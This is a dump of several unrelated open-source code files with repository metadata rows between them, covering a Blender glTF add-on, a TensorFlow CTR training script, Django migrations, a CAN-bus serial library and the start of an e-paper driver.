("FLAT", "Flat Shading", ""),
("SMOOTH", "Smooth Shading", "")),
description="How normals are computed during import",
default="NORMALS")
def draw(self, context):
layout = self.layout
layout.prop(self, 'import_pack_images')
layout.prop(self, 'import_shading')
def execute(self, context):
return self.import_gltf2(context)
def import_gltf2(self, context):
import os
self.set_debug_log()
import_settings = self.as_keywords()
if self.files:
# Multiple file import
ret = {'CANCELLED'}
dirname = os.path.dirname(self.filepath)
for file in self.files:
path = os.path.join(dirname, file.name)
if self.unit_import(path, import_settings) == {'FINISHED'}:
ret = {'FINISHED'}
return ret
else:
# Single file import
return self.unit_import(self.filepath, import_settings)
def unit_import(self, filename, import_settings):
import time
from .io.imp.gltf2_io_gltf import glTFImporter
from .blender.imp.gltf2_blender_gltf import BlenderGlTF
self.gltf_importer = glTFImporter(filename, import_settings)
success, txt = self.gltf_importer.read()
if not success:
self.report({'ERROR'}, txt)
return {'CANCELLED'}
success, txt = self.gltf_importer.checks()
if not success:
self.report({'ERROR'}, txt)
return {'CANCELLED'}
self.gltf_importer.log.critical("Data are loaded, start creating Blender stuff")
start_time = time.time()
BlenderGlTF.create(self.gltf_importer)
elapsed_s = "{:.2f}s".format(time.time() - start_time)
self.gltf_importer.log.critical("glTF import finished in " + elapsed_s)
self.gltf_importer.log.removeHandler(self.gltf_importer.log_handler)
return {'FINISHED'}
def set_debug_log(self):
import logging
if bpy.app.debug_value == 0:
self.loglevel = logging.CRITICAL
elif bpy.app.debug_value == 1:
self.loglevel = logging.ERROR
elif bpy.app.debug_value == 2:
self.loglevel = logging.WARNING
elif bpy.app.debug_value == 3:
self.loglevel = logging.INFO
else:
self.loglevel = logging.NOTSET
def menu_func_import(self, context):
self.layout.operator(ImportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')
if bpy.app.version < (2, 80, 0):
classes = (
ExportGLTF2,
ImportGLTF2
)
else:
classes = (
ExportGLTF2,
GLTF_PT_export_main,
GLTF_PT_export_include,
GLTF_PT_export_transform,
GLTF_PT_export_geometry,
GLTF_PT_export_geometry_compression,
GLTF_PT_export_animation,
GLTF_PT_export_animation_export,
GLTF_PT_export_animation_shapekeys,
GLTF_PT_export_animation_skinning,
ImportGLTF2
)
def register():
for c in classes:
bpy.utils.register_class(c)
# bpy.utils.register_module(__name__)
# add to the export / import menu
if bpy.app.version < (2, 80, 0):
bpy.types.INFO_MT_file_export.append(menu_func_export)
bpy.types.INFO_MT_file_import.append(menu_func_import)
else:
bpy.types.TOPBAR_MT_file_export.append(menu_func_export)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
for c in classes:
bpy.utils.unregister_class(c)
# bpy.utils.unregister_module(__name__)
# remove from the export / import menu
if bpy.app.version < (2, 80, 0):
bpy.types.INFO_MT_file_export.remove(menu_func_export)
bpy.types.INFO_MT_file_import.remove(menu_func_import)
else:
bpy.types.TOPBAR_MT_file_export.remove(menu_func_export)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
| 34.121849 | 147 | 0.646164 |
795c7855b29438d83e342fa0aef143712eb27ec0 | 6,070 | py | Python | mydeepctr/examples/lr/controller.py | Liulinghzi/DeepCTR | bb3f204e368ad34d84639025480613abd99231c5 | [
"Apache-2.0"
] | null | null | null | mydeepctr/examples/lr/controller.py | Liulinghzi/DeepCTR | bb3f204e368ad34d84639025480613abd99231c5 | [
"Apache-2.0"
] | null | null | null | mydeepctr/examples/lr/controller.py | Liulinghzi/DeepCTR | bb3f204e368ad34d84639025480613abd99231c5 | [
"Apache-2.0"
] | null | null | null | '''
@Author: your name
@Date: 2020-05-27 14:53:55
@LastEditTime: 2020-06-09 13:07:02
@LastEditors: Please set LastEditors
@Description: In User Settings Edit
@FilePath: /model-building/recommend/estimator/lr.py
'''
import tensorflow as tf
import os
import sys
import json
import argparse
tf.logging.set_verbosity(tf.logging.INFO)
# ================================= 预先写好tfrecord =================================
parser = argparse.ArgumentParser()
parser.add_argument("--tfrecord_dir", type=str, default="../data/")
parser.add_argument("--project_dir", type=str, default=None)
parser.add_argument("--output_dir", type=str, default=None)
parser.add_argument("--mode", type=str, default='train')
parser.add_argument("--dense_cols", type=str, default=None)
parser.add_argument("--sparse_cols", type=str, default=None)
parser.add_argument("--seq_cols", type=str, default=None)
parser.add_argument("--target", type=str, default=None)
parser.add_argument("--vocab_list", type=str, default=None)
parser.add_argument("--exclude", type=str, default="")
parser.add_argument("--batch_size", type=int, default=10)
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epoches", type=int, default=10)
parser.add_argument("--num_examples", type=int, default=100)
parser.add_argument('--use_bn', action='store_true', default=False)
parser.add_argument('--use_deep', action='store_true', default=False)
parser.add_argument("--log_step_count_steps", type=int, default=1000)
parser.add_argument("--save_checkpoints_steps", type=int, default=1000)
parser.add_argument("--summary_save_dir", type=str, default='./log/summary/')
parser.add_argument("--summary_every_n_step", type=int, default=1000)
parser.add_argument("--ckpt_save_dir", type=str, default='./log/summary/')
args = parser.parse_args()
sys.path.append(args.project_dir)
from models.lr import LRConfig
from inputs import DenseFeature, SparseFeature
from model import model_fn_builder
from data import tfrecord2fn,csv2tfrecord
# ================================= 环境配置 =================================
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
num_train_steps = args.num_examples / args.batch_size * args.num_epoches
# ================================= 模型定义 =================================
if args.dense_cols is None:
dense_features = []
else:
dense_features = [f.strip() for f in args.dense_cols.split(',')]
if args.sparse_cols is None:
sparse_features = []
vocab_list = []
vocab_dict = {}
else:
sparse_features = [f.strip() for f in args.sparse_cols.split(',')]
vocab_list = [int(v.strip()) for v in args.vocab_list.split(',')]
vocab_dict = {feat:vocab_list[idx] for idx, feat in enumerate(sparse_features)}
sparse_feature_columns = [SparseFeature(feature_name=feat, vocab_size=vocab_dict[feat], embedding_dim=3) for feat in sparse_features]
dense_feature_columns = [DenseFeature(feature_name=feat) for feat in dense_features]
dnn_feature_columns = dense_feature_columns + sparse_feature_columns
linear_feature_columns = dense_feature_columns + sparse_feature_columns
model_config = LRConfig(dnn_feature_columns, linear_feature_columns, class_num=2)
model_fn = model_fn_builder(
model_config=model_config,
learning_rate=args.learning_rate,
init_checkpoint=None,
summary_save_dir=args.summary_save_dir,
summary_every_n_step=args.summary_every_n_step,
task='binary_classification'
)
# ================================= estimator配置 =================================
session_config = tf.ConfigProto(allow_soft_placement=True)
run_config = tf.estimator.RunConfig(
log_step_count_steps=args.log_step_count_steps,
save_checkpoints_steps=args.save_checkpoints_steps,
session_config=session_config,
model_dir=args.ckpt_save_dir
)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=args.ckpt_save_dir,
params={},
config=run_config
)
# ================================= estimator执行 =================================
# ======================== 构建输入 ========================
# 配置tfrecord的数据结构格式
name2features = {}
for f in sparse_features:
name2features[f] = tf.io.FixedLenFeature([], tf.int64)
for f in dense_features:
name2features[f] = tf.io.FixedLenFeature([], tf.float32)
for f in [args.target]:
name2features[f] = tf.io.FixedLenFeature([], tf.float32)
if args.mode == 'train':
train_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'train.tfrecord'), name2features, args.batch_size, args.num_epoches,drop_remainder=True, mode=tf.estimator.ModeKeys.TRAIN, target=args.target)
elif args.mode == 'eval':
eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.EVAL, target=args.target)
elif args.mode == 'test':
eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.PREDICT, target=args.target)
# ======================== 进行训练 ========================
try:
early_stopping_hook = tf.estimator.experimental.stop_if_no_decrease_hook(
estimator=estimator,
metric_name='eval_loss',
max_steps_without_decrease=1000,
run_every_secs=None,
run_every_steps=1000
)
except:
early_stopping_hook = tf.contrib.estimator.stop_if_no_decrease_hook(
estimator=estimator,
metric_name='eval_loss',
max_steps_without_decrease=1000,
run_every_secs=None,
run_every_steps=1000
)
if args.mode == 'train':
estimator.train(train_input_fn, max_steps=num_train_steps)
elif args.mode == 'eval':
res = estimator.evaluate(eval_input_fn)
print(res)
res = {k:float(res[k]) for k in res}
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
with open(os.path.join(args.output_dir, 'result.json'), 'w') as f:
json.dump(res, f)
| 39.673203 | 208 | 0.691928 |
795c78641403b17aae37d2faf634124d1b793c05 | 614 | py | Python | revolt/__init__.py | XiehCanCode/revolt.py | 0b14143610f544d73ba9dde02adedafc51d76228 | [
"MIT"
] | null | null | null | revolt/__init__.py | XiehCanCode/revolt.py | 0b14143610f544d73ba9dde02adedafc51d76228 | [
"MIT"
] | null | null | null | revolt/__init__.py | XiehCanCode/revolt.py | 0b14143610f544d73ba9dde02adedafc51d76228 | [
"MIT"
] | null | null | null | from .asset import Asset
from .channel import (Channel, DMChannel, GroupDMChannel, SavedMessageChannel,
TextChannel, VoiceChannel)
from .client import Client
from .embed import Embed
from .enums import AssetType, ChannelType, PresenceType, RelationshipType, SortType
from .errors import HTTPError, RevoltError, ServerError
from .file import File
from .member import Member
from .message import Message
from .messageable import Messageable
from .permissions import Permissions
from .role import Role
from .server import Server
from .user import Relation, Status, User
__version__ = (0, 0, 1)
| 34.111111 | 83 | 0.786645 |
795c786d4d0f97caf8d1fdae3be96e252f939d35 | 742 | py | Python | auth/migrations/0001_initial.py | JohnAzedo/NewsletterServer | 0e9df39afcbb148064a8e25890597676e0e22a57 | [
"MIT"
] | 1 | 2021-11-30T23:44:25.000Z | 2021-11-30T23:44:25.000Z | auth/migrations/0001_initial.py | JohnAzedo/NewsletterServer | 0e9df39afcbb148064a8e25890597676e0e22a57 | [
"MIT"
] | null | null | null | auth/migrations/0001_initial.py | JohnAzedo/NewsletterServer | 0e9df39afcbb148064a8e25890597676e0e22a57 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-04-10 00:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='InviteCode',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=10)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 28.538462 | 118 | 0.641509 |
795c7971f438b9dffc216d8a05e45153776ec280 | 887 | py | Python | various_scripts/metadata_script.py | cc-ai/floods-gans | 787dc2a3c08483c68a687b4355c0f0f6f2711ab9 | [
"Apache-2.0"
] | 5 | 2019-05-07T15:14:58.000Z | 2020-11-23T00:21:50.000Z | various_scripts/metadata_script.py | cc-ai/floods | 787dc2a3c08483c68a687b4355c0f0f6f2711ab9 | [
"Apache-2.0"
] | 13 | 2019-04-25T01:06:20.000Z | 2022-03-11T23:51:04.000Z | various_scripts/metadata_script.py | cc-ai/floods | 787dc2a3c08483c68a687b4355c0f0f6f2711ab9 | [
"Apache-2.0"
] | 4 | 2019-04-24T18:06:10.000Z | 2020-07-15T18:02:56.000Z | # run command : python3 metadata_script.py log_dir img_dir
# log_dir is the logs folder
# img_dir is the downloads folder
import json
import os
import sys
import os.path
log_dir = sys.argv[1]
img_dir = sys.argv[2]
for filename in os.listdir(log_dir):
if filename.endswith(".json"):
data1 = []
with open(os.path.join(log_dir, filename)) as json_file:
data = json.load(json_file)
core_file = os.path.splitext(filename)[0]
for item in range(len(data)):
exists = os.path.isfile(
os.path.join(
img_dir, os.path.join(core_file, data[item]["image_filename"])
)
)
if exists:
data1.append(data[item])
with open(os.path.join(log_dir, filename), "w") as outfile:
json.dump(data1, outfile)
| 32.851852 | 86 | 0.570462 |
795c79975b82f740c3b646348821272d855948da | 826 | py | Python | repair/featurize/featurizer.py | laferrieren/HoloClean | 8242e541c84f60d5ad09b6689b3982de1e1e57d3 | [
"Apache-2.0"
] | null | null | null | repair/featurize/featurizer.py | laferrieren/HoloClean | 8242e541c84f60d5ad09b6689b3982de1e1e57d3 | [
"Apache-2.0"
] | 1 | 2018-11-21T06:59:55.000Z | 2018-11-21T06:59:55.000Z | repair/featurize/featurizer.py | laferrieren/HoloClean | 8242e541c84f60d5ad09b6689b3982de1e1e57d3 | [
"Apache-2.0"
] | null | null | null | from abc import ABCMeta, abstractmethod
from multiprocessing import Pool
class Featurizer:
__metaclass__ = ABCMeta
def __init__(self, name):
self.name = name
self.setup_done = False
def setup_featurizer(self, dataset, total_vars, classes, processes=20):
self.ds = dataset
self.total_vars = total_vars
self.classes = classes
self.pool = Pool(processes)
self.setup_done = True
self.specific_setup()
@abstractmethod
def specific_setup(self):
raise NotImplementedError
@abstractmethod
def create_tensor(self):
"""
This method creates a tensor which has shape
[rv_index, (a torch tensor of dimensions classes x features)]
:return PyTorch Tensor
"""
raise NotImplementedError
| 25.8125 | 75 | 0.652542 |
795c79d5604ba4884feae539d3fcf791d1da6ad8 | 1,685 | py | Python | main.py | CILAB-MA/Machine_ToM | 8c168ee31cc95a7f57998e8907273799533fe04f | [
"MIT"
] | 13 | 2021-12-08T07:17:55.000Z | 2022-03-30T10:07:38.000Z | main.py | CILAB-MA/Machine_ToM | 8c168ee31cc95a7f57998e8907273799533fe04f | [
"MIT"
] | null | null | null | main.py | CILAB-MA/Machine_ToM | 8c168ee31cc95a7f57998e8907273799533fe04f | [
"MIT"
] | 1 | 2022-01-14T02:56:38.000Z | 2022-01-14T02:56:38.000Z | import experiment1.experiment as experiment1
import experiment2.experiment as experiment2
import argparse
from utils import utils
EXPERIMENTS = [experiment1, experiment2] # experiment 3 will be update
def parse_args():
parser = argparse.ArgumentParser('For ToM Passive Exp')
parser.add_argument('--num_epoch', '-e', type=int, default=100)
parser.add_argument('--main_exp', '-me', type=int, default=2)
parser.add_argument('--sub_exp', '-se', type=int, default=1)
parser.add_argument('--num_agent', '-na', type=int, default=1000)
parser.add_argument('--batch_size', '-b', type=int, default=32)
parser.add_argument('--lr', '-l', type=float, default=1e-4)
parser.add_argument('--alpha', '-a', type=float, default=0.01)
parser.add_argument('--save_freq', '-s', type=int, default=10)
parser.add_argument('--train_dir', default='none', type=str)
parser.add_argument('--eval_dir', default='none', type=str)
args = parser.parse_args()
return args
def main(args):
experiment_folder = utils.make_folder()
EXPERIMENTS[args.main_exp - 1].run_experiment(num_epoch=args.num_epoch, main_experiment=args.main_exp,
sub_experiment=args.sub_exp, num_agent=args.num_agent,
batch_size=args.batch_size, lr=args.lr,
experiment_folder=experiment_folder,
alpha=args.alpha, save_freq=args.save_freq,
train_dir=args.train_dir, eval_dir=args.eval_dir)
if __name__ == '__main__':
args = parse_args()
main(args) | 45.540541 | 106 | 0.6273 |
795c79f9b2ce890c85d960d65da9d3d7b4503497 | 19,746 | py | Python | pykarbon/can.py | onlogic/Pykarbon | c968a95d669595614476f38a7b117fdf86b629e0 | [
"BSD-3-Clause"
] | 4 | 2020-01-06T17:26:26.000Z | 2021-12-16T09:36:03.000Z | pykarbon/can.py | onlogic/Pykarbon | c968a95d669595614476f38a7b117fdf86b629e0 | [
"BSD-3-Clause"
] | 2 | 2020-03-27T20:59:21.000Z | 2020-06-26T15:31:49.000Z | pykarbon/can.py | onlogic/Pykarbon | c968a95d669595614476f38a7b117fdf86b629e0 | [
"BSD-3-Clause"
] | 1 | 2020-03-10T14:11:03.000Z | 2020-03-10T14:11:03.000Z | # -*- coding: utf-8 -*-
''' Tool for running a session with the can interface.
Example:
.. code-block:: python
import pykarbon.can as pkc
from time import sleep
with pkc.Session() as dev:
dev.write(0x123, 0x11223344) # Send a message
sleep(5) # Your code here!
dev.storedata('can_messages') # Save messages that we receive while we waited
Lets us autodetect the can bus baudrate, write data to the can bus, wait for some messages to
be receive, and finally save those messages to can_messages.csv
'''
from time import sleep, time
import threading
import re
import pykarbon.hardware as pk
# Tools --------------------------------------------------------------------------------------------
def stringify(value):
''' Takes variously formatted hex values and outputs them in simple string format '''
out = ''
if value:
out = (hex(value) if isinstance(value, int) else value).replace('0x', '').upper()
return out
def hexify(value):
''' Takes variously formatted hex values and outputs them as a int '''
out = 0x0
if value:
out = int(value.replace('0x', ''), 16) if isinstance(value, str) else value
return out
# --------------------------------------------------------------------------------------------------
class Session():
'''Attaches to CAN serial port and allows reading/writing from the port.
Automatically performs port discovery on linux and windows. Then is able to take
ownership of a port and perform read/write operations. Also offers an intelligent
method of sending can messages that will automatically determine frame format, type,
and data length based only on the message id and data.
There is additional support for registering a function to certain can data ids. When the
interface receives a registered message, it will call the function and send the returned
data. This features requires running the session with automonitoring enabled.
By default, the session will also try to automatically discover the bus baudrate.
Arguments:
baudrate (int/str, optional):
`None` -> Disable setting baudrate altogther (use mcu stored value)
`'autobaud'` -> Attempt to automatically detect baudrate
`100 - 1000` -> Set the baudrate to the input value, in thousands
timeout (float, optional): Time until read/write attempts stop in seconds. (None disables)
automon (bool, optional): Automatically monitor incoming data in the background.
reaction_poll_delay (float, optional): Time between checking received data for a registered
value. Decreasing this delay will consume more unused CPU time.
If the baudrate option is left blank, the device will instead attempt to automatically
detect the baudrate of the can-bus. When 'automon' is set to 'True', this object will
immediately attempt to claim the CAN connection that it discovers. Assuming the connection
can be claimed, the session will then start monitoring all incoming data in the background.
This data is stored in the the session's 'data' attribute, and can be popped from the queue
using the 'popdata' method. Additionally, the entire queue may be purged to a csv file using
the 'storedata' method -- it is good practice to occasionally purge the queue.
Attributes:
interface: :class:`pykarbon.hardware.Interface`
pre_data: Data before it has been parsed by the registry service.
data: Queue for holding the data read from the port
isopen: Bool to indicate if the interface is connected
baudrate: Reports the discovered or set baudrate
registry: Dict of registered DIO states and function responses
bgmon: Thread object of the bus background monintor
'''
def __init__(self, baudrate='autobaud', timeout=.01, automon=True, reaction_poll_delay=.01):
'''Discovers hardware port name.'''
self.interface = pk.Interface('can', timeout)
self.poll_delay = reaction_poll_delay
self.baudrate = None
self.pre_data = []
self.data = []
self.isopen = False
self.bgmon = None
self.registry = {}
if baudrate == 'autobaud':
self.autobaud(None)
elif isinstance(baudrate, int):
self.autobaud(baudrate)
if automon:
self.open()
self.bgmonitor()
else:
self.data = self.pre_data
def __enter__(self):
if not self.isopen:
self.interface.__enter__()
self.isopen = True
return self
def open(self):
'''Claim the interface (only one application may open the serial port)'''
if not self.isopen:
self.interface.claim()
self.isopen = True
return self.isopen
def pushdata(self, line: str):
'''Add data to the end of the session queue.
NOTE: Strips EoL characters.
Args:
line: Data that will be pushed onto the queue
'''
self.data.append(line.strip('\n\r'))
def autobaud(self, baudrate: int) -> str:
'''Autodetect the bus baudrate
If the passed argument 'baudrate' is None, the baudrate will be autodetected,
otherwise, the bus baudrate will be set to the passed value.
When attempting to auto-detect baudrate, the system will time-out after 3.5 seconds.
Args:
baudrate: The baudrate of the bus in thousands. Set to 'None' to autodetect
Returns:
The discovered or set baudrate
'''
set_rate = None
with pk.Interface('terminal', timeout=.001) as term:
if not baudrate:
term.cwrite('can-autobaud')
start = time()
elapsed = 0
set_rate = term.cread()[0].strip('\n\r')
while not set_rate and elapsed < 3.5:
set_rate = term.cread()[0].strip('\n\r')
elapsed = time() - start
else:
term.cwrite('set can-baudrate ' + str(baudrate))
set_rate = str(baudrate)
temp = re.search(r'\s(?P<baud>[\d]+)k', set_rate)
self.baudrate = temp.groupdict()['baud'] if temp else None
return self.baudrate
@staticmethod
def format_message(id, data, **kwargs):
''' Takes an id and data and determines other message characteristics
When keyword arguments are left blank, this function will extrapolate the correct
frame information based on the characteristics of the passed id and data.
If desired, all of the automatically determined characteristics may be overwritten.
Args:
data_id: Data id of the message, in hex (0x123, '0x123', '123')
data: Message data, in hex -- if 'None', the device will send a remote frame.
NOTE: Use string version of hex to send leading zeroes ('0x00C2' or '00C2')
**kwargs:
*format*: Use standard or extended frame data id ('std' or 'ext')
*length*: Length of data to be transmitted, in bytes (11223344 -> 4)
*type*: Type of frame ('remote' or 'data')
'''
data = stringify(data)
message = {
'format': kwargs.get('format', 'std' if hexify(id) <= 0x7FF else 'ext'),
'id': stringify(id),
'length': kwargs.get('length', int(len(data) / 2)),
'data': data,
'type': kwargs.get('type', 'data' if data else 'remote')
}
return message
def send_can(self, message) -> str:
'''Transmits the passed message on the canbus
Args:
message: A dictionary containing the data required to build a can message
Returns:
The string version of the transmitted message
'''
str_message = '{format} {id} {length} {data} {type}'.format(**message)
self.interface.cwrite(str_message)
# Encourage io to actually send packets
sleep(.0001)
return str_message
def register(self, data_id, action, **kwargs):
'''Automatically perform action upon receiving data_id
Register an action that should be automatically performed when a certain data
id is read. By default the action will be performed when the id is attached
to any frame type, and the action's returned data will be checked -- if the data
can be formatted as a can message, it will automatically be transmitted as a reply.
Actions should be a python function, which will be automatically wrapped in a
pykarbon.can.Reactions object by this function. When the passed action is called
Reactions will try to pass it the hex id and data as the first and second positional
arguments. If thrown a TypeError, it will call the action without any arguments.
Example:
>>> Session.register(0x123, action)
Note:
If the frame is a remote request frame, the passed data will be 'remote' instead
of an int!
Args:
data_id: The hex data_id that the action will be registered to
action: The python function that will be performed.
kwargs:
remote_only: Respond only to remote request frames (Default: False)
run_in_background: Run action as background task (Default: True)
auto_response: Automatically reply with returned message (Default: True)
Returns:
The 'Reaction' object that will be used in responses to this data_id
'''
reaction = Reactions(self.write, data_id, action, **kwargs)
self.registry[data_id] = reaction
return reaction
def write(self, can_id, data):
'''Auto-format and transmit message
For the large majority of use cases, this is the simplest and best method to send a packet
of data over the canbus. Only message id and the data need to specified as hex values. All
other information about the packet will be extrapolated.
Args:
can_id: The hex id of the data
data: The hex formatted data
'''
message = self.format_message(can_id, data)
self.send_can(message)
def readline(self):
'''Reads a single line from the port, and stores the output in self.data
If no data is read from the port, then nothing is added to the data queue.
Returns
The data read from the port
'''
line = ""
if self.isopen:
line = self.interface.cread()[0]
if line:
self.pre_data.append(line)
return line
def bgmonitor(self):
'''Start monitoring the canbus in the background
Uses python threading module to start the monitoring process.
Returns:
The 'thread' object of this background process
'''
if not self.data:
self.data = []
self.bgmon = threading.Thread(target=self.monitor)
self.bgmon.start()
threading.Thread(target=self.registry_service).start()
return self.bgmon
def monitor(self):
'''Watches port for can data while connection is open.
The loop is predicated on the connection being open; closing the connection will stop the
monitoring session.
Args:
session: A canbus session object
Returns:
The method used to stop monitoring. (str)
'''
retvl = "SessionClosed"
while self.isopen:
try:
self.readline()
except KeyboardInterrupt:
retvl = "UserCancelled"
return retvl
def registry_service(self):
'''Check if receive line has a registered action.
If the receive line does have an action, perform it, and then move the data
into the main data queue. Otherwise, just move the data.
'''
while self.isopen:
# Allow CPU to have time
sleep(self.poll_delay)
try:
line = self.pre_data.pop(0)
if line:
self.check_action(line)
self.pushdata(line)
except IndexError:
continue
return 0
def check_action(self, line):
'''Check is message has an action attached, and execute if found
Args:
line: Can message formatted as [id] [data]
'''
try:
data_id, message = line.strip('\n\r').split(' ')
except ValueError:
return
data_id = int(data_id, 16)
if data_id in self.registry:
reaction = self.registry[data_id]
if reaction.remote_only and ("remote" not in message):
return
if reaction.run_in_background:
reaction.bgstart(message)
else:
reaction.start(message)
return
def storedata(self, filename: str, mode='a+'):
'''Pops the entire queue and saves it to a csv.
This method clears the entire queue: once you have called it, all previously received
data will no longer be stored in the sessions 'data' attribute. Instead, this data will
now reside in the specified .csv file.
Each received can message has its own line of the format: id,data.
By default, if a file that already exists is specified, the data will append to the end of
this file. This behavior can be changed by setting 'mode' to any standard 'file.write' mode.
Args:
filename: Name of file that will be created.
mode(str, optional): The file write mode to be used.
'''
if '.csv' not in filename:
filename = filename + '.csv'
with open(filename, mode) as datafile:
while True:
line = self.popdata()
if not line:
break
line = line.strip('\n\r')
line = line.replace(' ', ',')
datafile.write(line + "\n")
def popdata(self):
'''If there is data in the queue, pop an entry and return it.
Uses queue behavior, so data is returned with 'first in first out' logic
Returns:
String of the data read from the port. Returns empty string if the queue is empty
'''
try:
out = self.data.pop(0)
except IndexError:
out = ""
return out
def close(self):
'''Release the interface so that other session may interact with it
Any existing background monitor session will also be closed. If this session re-opens the
connection, background monitoring will need to be manually restarted with the 'bgmonitor'
method.
'''
self.isopen = False
try:
if self.bgmon.isAlive():
sleep(.1)
except AttributeError:
sleep(.001)
self.interface.release()
def __exit__(self, etype, evalue, etraceback):
self.isopen = False
try:
if self.bgmon.isAlive():
sleep(.1)
except AttributeError:
sleep(.001)
self.interface.__exit__(etype, evalue, etraceback)
def __del__(self):
if self.isopen:
self.close()
class Reactions():
'''A class for performing automated responses to certain can messages.
If the action returns a dict of hex id and data, then the reaction will
automatically respond with this id and data. If the dict has 'None' for
id, then the reaction will respond with the originating frame's id and
then returned data.
Note:
Example action response: {'id': 0x123, 'data': 0x11223344}
Attributes:
data_id: The can data id registered with this reaction
action: Function called by this reaction
remote_only: If the reaction will respond to non-remote request frames
run_in_background: If reaction will run as background thread
auto_response: If reaction will automatically reply
canwrite: Helper to write out can messages
'''
def __init__(self, canwrite, data_id, action, **kwargs):
'''Init attributes
Additonally sets all kwargs to default values if they are not
explicitly specified.
'''
self.canwrite = canwrite
self.data_id = data_id
self.action = action
if 'remote_only' in kwargs:
self.remote_only = kwargs['remote_only']
else:
self.remote_only = False
if 'run_in_background' in kwargs:
self.run_in_background = kwargs['run_in_background']
else:
self.run_in_background = True
if 'auto_response' in kwargs:
self.auto_response = kwargs['auto_response']
else:
self.auto_response = True
def start(self, hex_data):
'''Run the action in a blocking manner
Args:
hex_data: The hex data of the message that invoked this reaction.
Should be the string 'remote' for remote frames.
'''
if not self.remote_only and ('remote' not in hex_data):
hex_data = int(hex_data, 16) if hex_data else None
try:
out = self.action(self.data_id, hex_data)
except TypeError:
out = self.action()
return self.respond(out)
def bgstart(self, hex_data):
'''Call start as a background thread
Returns:
The thread of the background action
'''
bgaction = threading.Thread(target=self.start, args=[hex_data])
bgaction.start()
return bgaction
def respond(self, returned_data):
'''Automatically respond to frames, if requested
Args:
returned_data: A dict of id and data. If None, no response will be sent
'''
if (not returned_data) or (not self.auto_response):
return
try:
if not returned_data['id']:
self.canwrite(self.data_id, returned_data['data'])
else:
self.canwrite(returned_data['id'], returned_data['data'])
except (TypeError, KeyError) as bad_return:
print("Bad action response: ", bad_return)
return
return
def hardware_reference(device='K300'):
'''Print useful hardware information about the device
Displays hardware information about the CAN device, such as pinouts.
Then pinouts assume that the user is facing the front of the device, and that the fins
are pointed up.
Args:
device (str, optional): The karbon series being used. Defaults to the K300
'''
ref_k300 = \
'''
Info: Compliant with CAN 2.0B. The canbus is not internally terminated; the device
should be used with properly terminated CAN cables/bus. The termination resistors
are required to match the nominal impedance of the cable. To meet ISO 11898, this
resistance should be 120 Ohms.
Pinout:
---------------------
|| 3 | 2 | 1 ||
|| ^ ^ ^ ||
|| |_| |_| |_| ||
|| GND | LOW | HGH ||
---------------------
'''
ref_dict = {
'K300': ref_k300,
'K700': ref_k300
}
try:
print(ref_dict[device.upper()])
except KeyError:
print("Please select from: [K300, K700]")
| 33.298482 | 100 | 0.603261 |
795c79fb074641f862d53020c8d9ca40c5c72a7c | 1,272 | py | Python | jbupower/api/migrations/0001_initial.py | arc-menace/JBU-Solar-Power-Mobile-App | 95cb97e273260e2f9ce0e0c492d60bff4008839c | [
"MIT"
] | null | null | null | jbupower/api/migrations/0001_initial.py | arc-menace/JBU-Solar-Power-Mobile-App | 95cb97e273260e2f9ce0e0c492d60bff4008839c | [
"MIT"
] | null | null | null | jbupower/api/migrations/0001_initial.py | arc-menace/JBU-Solar-Power-Mobile-App | 95cb97e273260e2f9ce0e0c492d60bff4008839c | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-02-25 06:39
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Solar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_power', models.FloatField()),
('energy_today', models.FloatField()),
('energy_lifetime', models.FloatField()),
('summary_date', models.DateTimeField()),
('status', models.CharField(max_length=255)),
('time', models.TimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Weather',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(max_length=255)),
('temp', models.FloatField()),
('wind_speed', models.FloatField()),
('clouds', models.IntegerField()),
('time', models.TimeField(auto_now=True)),
],
),
]
| 33.473684 | 114 | 0.537736 |
795c7adb4f3a632db9ddc66742da3c69ce8cf882 | 12,716 | py | Python | epaper2in13b.py | astranome/micropython-waveshare-epaper | ef2f04da78c341b6469c420f384711e89d91b172 | [
"MIT"
] | null | null | null | epaper2in13b.py | astranome/micropython-waveshare-epaper | ef2f04da78c341b6469c420f384711e89d91b172 | [
"MIT"
] | null | null | null | epaper2in13b.py | astranome/micropython-waveshare-epaper | ef2f04da78c341b6469c420f384711e89d91b172 | [
"MIT"
] | null | null | null | """
MicroPython Waveshare 2.13" Black/White/Red GDEW0213Z16 e-paper display driver
https://github.com/mcauser/micropython-waveshare-epaper
ERRORS ARE FIXED
MIT License
Copyright (c) 2017 Waveshare
Copyright (c) 2018 Mike Causer
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
